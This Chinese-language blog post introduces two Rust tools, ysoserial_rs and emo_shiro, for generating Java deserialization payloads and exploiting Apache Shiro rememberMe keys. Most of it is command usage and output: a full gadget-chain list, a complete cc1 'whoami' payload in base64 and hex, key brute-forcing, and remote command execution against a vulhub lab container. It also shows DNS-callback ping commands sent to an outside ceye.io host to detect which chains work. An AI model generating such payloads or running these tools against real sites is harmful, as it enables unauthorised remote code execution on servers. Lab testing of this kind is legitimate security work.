Kali-Team

前言

最近挖SRC用之前go写的key检测工具找到了很多apache-shiro的网站，但是提交还得验证能够利用漏洞才可以，因为很多都是有key但是没有利用链的，网上的利用工具多数为java编写的图形化工具，但是在我系统因为开发装了IDEA，切换java环境比较麻烦，而且要指定javafx模块才可以显示图形化界面，所以写了一个纯Rust语言的利用工具。

ysoserial

问题最大的就是java的反序列化了，不是java语言开发的就无法引用https://github.com/frohoff/ysoserial的代码了，但是go语言开发的https://github.com/chaitin/xray也可以做到，最后找到了https://github.com/phith0n/zkar，但是如果用rust重写的话工作量太大了，最后还是在java生成的ser文件做替换，只要将不同的命令参数生成出来diff就可以了。
最后按照替换命令的位置，和序列化生成的长度就可以得到和java生成出来的ser文件一样了。
最后的https://github.com/emo-cat/ysoserial_rs就出来了，针对java反序列化的库

➜  ~ ./ysoserial_amd64 --help
Usage: ysoserial_amd64 [-p <payload>] [-c <command>] [--url <url>] [--echo-name <echo-name>] [--command-name <command-name>] [-o <output>] [-f <format>] [-l]

ysoserial_rs

Options:
  -p, --payload     select a payload
  -c, --command     command to execute
  --url             url to request dns
  --echo-name       tomcat echo request header name
  --command-name    tomcat command request header name
  -o, --output      save payload to file
  -f, --format      format to hex or base64
  -l, --list        list all payload
  --help            display usage information

列举全部可用payload，为了方便使用常用的攻击链都简写了。

➜  ~ ./ysoserial_amd64 -l                                                                                                                    [5/62]
Payload List:                                                                                                                                      
------------                                                                                                                                       
bs1                                                                                                                                                
c3p0                                                                                                                                               
cc1                                                                                                                                                
cc2
cc3
cc4
cc5
cc6
cc7
cck1
cck1_tomcat_echo
cck2
cck2_tomcat_echo
cck3
cck4
clojure
groovy1
hibernate1
hibernate2
javassist_weld1
jboss_interceptors1
jdk7u21
jdk8u20
json1
mozilla_rhino1
mozilla_rhino2
myfaces1
rome
shiro_spc
spring1
spring2
url_dns
vaadin1

例如选择cc1攻击链，执行的命令为whoami

➜  ~ ./ysoserial_amd64 -p cc1 -c whoami
sr2sun.reflect.annotation.AnnotationInvocationHandlerU~L
java.util.Mapxrjava.lang.reflect.Proxy' CLht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapn唂yLfactoryt,LiTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;V*4xpsr;org.apache.commons.collections.functors.ConstantTransformerXvAL      iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformerk{|8[iArgst[Ljava/lang/Object;L
                                    iMethodNametLjava/lang/String;[
                                                                   iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;Xs)lxpt
getRuntimeur[Ljava.lang.Class;Zxpt      getMethoduq~vrjava.lang.String8z;Bxpvq~sq~uq~uq~invokeuq~vrjava.lang.Objectxpvq~q~ur[Ljava.lang.String;V{Gxptwhoamitexecuq~q~#sq~srjava.lang.Integer⠤8Ivaluexrjava.lang.Number
                                                                   xpsrjava.util.HashMap`F
loadFactorI     [email protected]~:%

可以输出到文件，或者格式化为hex和base64格式

➜  ~ ./ysoserial_amd64 -p cc1 -c whoami -o cc1.ser
写入文件:cc1.ser,payload大小:1398
➜  ~ ./ysoserial_amd64 -p cc1 -c whoami -f base64
rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAAVzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEWphdmEubGFuZy5SdW50aW1lAAAAAAAAAAAAAAB4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuSW52b2tlclRyYW5zZm9ybWVyh+j/a3t8zjgCAANbAAVpQXJnc3QAE1tMamF2YS9sYW5nL09iamVjdDtMAAtpTWV0aG9kTmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sAC2lQYXJhbVR5cGVzdAASW0xqYXZhL2xhbmcvQ2xhc3M7eHB1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAACdAAKZ2V0UnVudGltZXVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACcHVxAH4AGwAAAAB0AAZpbnZva2V1cQB+AB4AAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAbc3EAfgAWdXIAE1tMamF2YS5sYW5nLlN0cmluZzut0lbn6R17RwIAAHhwAAAAAXQABndob2FtaXQABGV4ZWN1cQB+AB4AAAABcQB+ACNzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHIAEGphdmEubGFuZy5OdW1iZXKGrJUdC5TgiwIAAHhwAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA6%
➜  ~ ./ysoserial_amd64 -p cc1 -c whoami -f hex
aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737d00000001000d6a6176612e7574696c2e4d6170787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707371007e00007372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001e00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001e7371007e00167571007e001b00000002707571007e001b00000000740006696e766f6b657571007e001e00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e001b7371007e0016757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000677686f616d69740004657865637571007e001e0000000171007e00237371007e0011737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878767200126a6176612e6c616e672e4f766572726964650000000000000000000000787071007e003a%

apache-shiro的利用

获取到目标先检测是否为apache-shiro组件，识别为是才进行后面的操作，然后爆破key，分别对HTTP请求：GET，POST；和加密模式：CBC，GCM进行枚举，和之前用go语言写的检测方法一样，得到key之后才到利用阶段。
利用阶段只要把shiro_spc的payload替换为攻击payload就可以了，如果只是想验证漏洞是否存在，就可以使用url_dns这个payload，指定DNS记录服务器，可以去查看DNS记录。

使用说明

https://github.com/emo-cat/emo_shiro

➜  ~ ./emo_shiro --help                                                    
Usage: emo_shiro [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]

emo_shiro

Options:
  --key             you can specify known keys
  -m, --mode        apache-shiro encryption algorithm,default: CBC
  -t, --target      the target
  -s, --ser         serialize file
  --file            read the target from the file
  --keys            read the key from the file
  --csv             export to the csv file
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --timeout         set request timeout
  --thread          number of concurrent threads
  --exploit         exploit mode
  --dns             dns identifier, default: 981tzg.ceye.io
  -p, --payload     select a payload
  -c, --command     command to execute
  --echo-name       tomcat echo request header name
  --command-name    tomcat command request header name
  -l, --list        list all payload
  --help            display usage information

靶场验证

搭建靶场

➜  ~ docker run --rm -p 8080:8080 vulhub/shiro:1.2.4

只爆破key，不做攻击操作，也就是之使用shiro_spc的payload。

➜  ~ ./emo_shiro -t <http://127.0.0.1:8080>                                  
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=F030B2F5CECA009F87310F3ADABDEDE5> | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

利用DNS记录验证漏洞

➜  ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit --dns test.981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=6E1B5E50D8ABC278B182A1EFEF0339C6> | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜  ~

Untitled

查看DNS记录得到目标和端口组合的前缀日志。
非回显验证，执行命令创建一个emo的文件夹。

➜  ~ ./emo_shiro -t <http://127.0.0.1:8080> --exploit -p cck1 -c "mkdir /emo"  
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=DCBEFCFB8DF4FA752EB0BD114D9BEE2A> | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
➜  ~
root@b956d303a5b1:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  shirodemo-1.0-SNAPSHOT.jar  srv  sys  tmp  usr  var
root@b956d303a5b1:/# ls
bin  boot  dev  emo  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  shirodemo-1.0-SNAPSHOT.jar  srv  sys  tmp  usr  var
root@b956d303a5b1:/# cd emo/
root@b956d303a5b1:/emo#

主要利用ping命令带上利用链名称拼接到DNS前缀，如果能在DNS记录中看到说明可以使用该利用链。
因为window和linux系统下ping限制次数的参数有冲突，在linux也不能一直让它ping，最后找到了两个系统都兼容的命令ping -n 2 -w 2 981tzg.ceye.io,虽然在linux前一个ping会报错，但是还是能自动结束。

➜  emo_shiro git:(main) ✗ cargo run -- -t <http://127.0.0.1:8080> --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| <http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7> | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

查看DNS记录得到可用利用链，说明bs1,cck3,cc5,cc7,cck1和cc6利用链可用

969227011	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:20
969226980	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:19
969226976	ccK3.127.0.0.1.8080.981tZG.cEYE.Io	127.0.0.1	2022-12-22 13:48:19
969226947	cc5.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226945	cc7.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226936	cCK3.127.0.0.1.8080.981tzg.ceyE.iO	127.0.0.1	2022-12-22 13:48:18
969226932	cck1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226818	cc6.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:14

参考

https://github.com/emo-cat/emo_shiro

https://github.com/emo-cat/ysoserial_rs